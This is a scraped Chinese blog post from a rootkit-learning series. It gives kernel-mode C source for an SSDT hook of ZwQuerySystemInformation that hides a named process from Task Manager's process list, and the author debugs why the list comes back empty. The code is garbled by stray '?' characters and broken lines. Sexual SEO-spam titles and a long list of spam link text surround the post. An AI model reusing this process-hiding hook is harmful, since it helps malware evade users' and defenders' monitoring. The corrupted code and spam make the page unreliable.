青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (七)

Posted on 2009-10-27 17:32 S.l.e!ep.¢% 閱讀(333) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (六)??

下面這個函數有問題,運行之后,Taskmgr.exe 里面的進程列表估然顯示為空
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
// 定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
& process_name,?L " taskmgr.exe " );
????
????rc?
= ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if (NT_SUCCESS(rc))?
????{
????????
????????
if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
????????????
struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
????????????
struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
????????????
if (curr -> NextEntryDelta)
????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
????????????
while (curr)
????????????{
????????????????
if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint((
" hide?process'name?taskmgr.exe " ));
????????????????????
????????????????????
if (prev)?
????????????????????{?
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
????????????????????????
else
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
????????????????????
else
????????????????????{
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation?
= (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
????????????????????????
else
????????????????????????{
????????????????????????????SystemInformation?
= ?NULL;
????????????????????????}
????????????????????}
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????{
????????????????????????curr?
= ?NULL;
????????????????????????
break ;
????????????????????}
????????????????????
????????????????}?
// ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
????????????????
if (curr? != ?NULL)
????????????????{
????????????????????prev?
= ?curr;
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????????curr?
= ?NULL;
????????????????????
????????????????}
// ?if(curr?!=?NULL)
????????????????
????????????}
// ?while(curr)?
????????????
????????}
// ?if(5?==?SystemInformationClass)
????????
????}
// ?if(NT_SUCCESS(rc))
????
????
// ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
???? return ?rc;
}

使用自己的查詢進程EXE(HOOK SSDT Hide Process (五) ),顯示結果是正常的

驅動中判斷的是 taskmgr.exe?,在遍歷時,taskmgr.exe 剛好在最好一個,把 NextEntryDelta 設置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的

看來,HOOK SSDT Hide Process (五) 遍歷進程的實現 跟 Taskmgr.exe 的實現有差異, 需要再找時間看下原因

MyZwQuerySystemInformation() 的實現來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數據傳給用戶態。
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲欧美日韩专区| 夜夜嗨一区二区三区| 国外成人在线视频| 一区二区三区国产精品| 免费观看在线综合| 欧美一区二区日韩| 国产精品国产馆在线真实露脸| 亚洲第一区中文99精品| 久久精品国产亚洲高清剧情介绍| 99香蕉国产精品偷在线观看| 欧美成年视频| 亚洲三级电影在线观看| 欧美va亚洲va日韩∨a综合色| 性色一区二区三区| 国产亚洲福利社区一区| 欧美制服丝袜第一页| 亚洲午夜精品久久| 国产精品一区在线播放| 校园激情久久| 先锋影音久久久| 国产综合色一区二区三区| 久久九九99视频| 久久久久久久一区| 亚洲黄色一区| 亚洲欧洲日本一区二区三区| 久久久午夜精品| 亚洲国产日韩美| 亚洲精品久久久久久一区二区| 欧美另类videos死尸| 在线中文字幕不卡| 亚洲视频每日更新| 国产亚洲精品v| 久久天天躁夜夜躁狠狠躁2022 | 亚洲盗摄视频| 欧美日韩国产精品专区| 欧美激情亚洲视频| 亚洲午夜精品视频| 亚洲精品一区二区三区不| 欧美日韩在线播放| 欧美亚洲日本国产| 久久久一二三| 日韩午夜精品视频| 亚洲一区欧美二区| 国产曰批免费观看久久久| 麻豆精品视频在线观看视频| 女人色偷偷aa久久天堂| 一区二区三区 在线观看视| 亚洲一卡久久| 狠狠色丁香久久综合频道| 亚洲国产毛片完整版| 欧美午夜无遮挡| 久久久久久久性| 欧美激情五月| 久久精品亚洲一区二区| 欧美成人a∨高清免费观看| 亚洲一区二区视频| 久久综合五月| 午夜精品免费| 噜噜噜躁狠狠躁狠狠精品视频| 亚洲五月婷婷| 久久躁日日躁aaaaxxxx| 在线视频日本亚洲性| 欧美在线免费播放| 亚洲桃花岛网站| 欧美91大片| 久久五月天婷婷| 国产伦精品一区二区三区视频黑人| 亚洲电影免费观看高清完整版在线观看 | 一区二区欧美日韩| 亚洲丶国产丶欧美一区二区三区 | 99re6热只有精品免费观看 | 亚洲九九爱视频| 激情欧美一区二区| 亚洲欧美一区二区三区久久 | 亚洲视频一区| 欧美国产一区视频在线观看| 久久伊伊香蕉| 国产亚洲欧美中文| 亚洲在线免费观看| 亚洲深夜福利| 欧美日韩精品二区| 亚洲国产视频a| 91久久精品一区| 久久综合狠狠综合久久综合88| 久久精品视频在线播放| 国产精品一区二区三区成人| 一区二区三区高清不卡| 性18欧美另类| 国产精品av久久久久久麻豆网| 欧美国产视频在线观看| 韩国在线视频一区| 午夜精品久久久| 欧美亚洲免费| 国产视频自拍一区| 亚洲欧美资源在线| 欧美在线亚洲一区| 国产亚洲成精品久久| 午夜视频久久久| 欧美在线视频免费| 国精品一区二区| 久久免费视频网站| 欧美激情va永久在线播放| 亚洲国产高清视频| 欧美精品午夜| 在线一区二区视频| 久久av在线| 影音先锋亚洲电影| 欧美成人一品| 99精品国产热久久91蜜凸| 亚洲免费视频网站| 国产亚洲激情在线| 久久久久久亚洲精品杨幂换脸| 欧美成熟视频| 99精品视频网| 国产精品夜夜嗨| 久久久.com| 亚洲精品久久久蜜桃 | 久久综合色播五月| 亚洲人体1000| 国产精品久久久久久妇女6080| 午夜欧美不卡精品aaaaa| 免费91麻豆精品国产自产在线观看| 亚洲欧洲日本在线| 欧美日韩在线播放三区| 欧美在线观看视频| 亚洲经典自拍| 欧美中文字幕视频| 亚洲国产成人精品视频| 欧美色综合天天久久综合精品| 亚洲一区免费网站| 亚洲电影在线免费观看| 性欧美大战久久久久久久免费观看 | 久久九九热免费视频| 亚洲七七久久综合桃花剧情介绍| 午夜激情综合网| 亚洲国产精品成人一区二区| 欧美日韩午夜| 久久久青草婷婷精品综合日韩| 亚洲日本电影| 久久综合伊人77777蜜臀| 亚洲最黄网站| 狠狠色丁香久久婷婷综合丁香| 欧美日本乱大交xxxxx| 久久精品1区| 正在播放欧美一区| 亚洲电影免费观看高清| 久久精品视频在线看| 中文在线不卡视频| 在线免费不卡视频| 国产欧美一区二区视频| 欧美精品福利视频| 久久夜色撩人精品| 亚洲在线播放电影| 亚洲免费av电影| 欧美成人免费小视频| 欧美成人午夜免费视在线看片| 亚洲国产精品va在线看黑人| 欧美天堂亚洲电影院在线观看| 欧美一区二区视频在线观看| 亚洲人成在线观看| 毛片一区二区三区| 久久超碰97中文字幕| 亚洲图片欧美日产| 亚洲精品久久久久久久久久久久 | 久久精品视频在线观看| 亚洲一区二区av电影| 亚洲看片免费| 亚洲精品日韩在线| 亚洲日本无吗高清不卡| 亚洲大胆av| 亚洲二区在线| 亚洲国产另类久久精品| 亚洲国内精品| 亚洲欧洲精品一区二区| 最近中文字幕日韩精品 | 亚洲欧美制服中文字幕| 一区二区国产在线观看| 亚洲精品影院| 一本久道久久综合婷婷鲸鱼| 亚洲麻豆国产自偷在线| 99国产精品久久久久久久久久| 亚洲乱码国产乱码精品精可以看| 亚洲国产精品第一区二区三区 | 日韩亚洲视频| 日韩亚洲在线观看| 一区二区三区 在线观看视| 一本一道久久综合狠狠老精东影业 | 久久免费午夜影院| 久久全国免费视频| 老司机一区二区三区| 欧美jjzz| 亚洲国内精品在线| 一本一本久久| 午夜亚洲福利| 午夜在线视频观看日韩17c| 久久精品国产亚洲aⅴ| 美女精品在线观看| 欧美日韩成人综合| 国产精品网站在线| 影院欧美亚洲|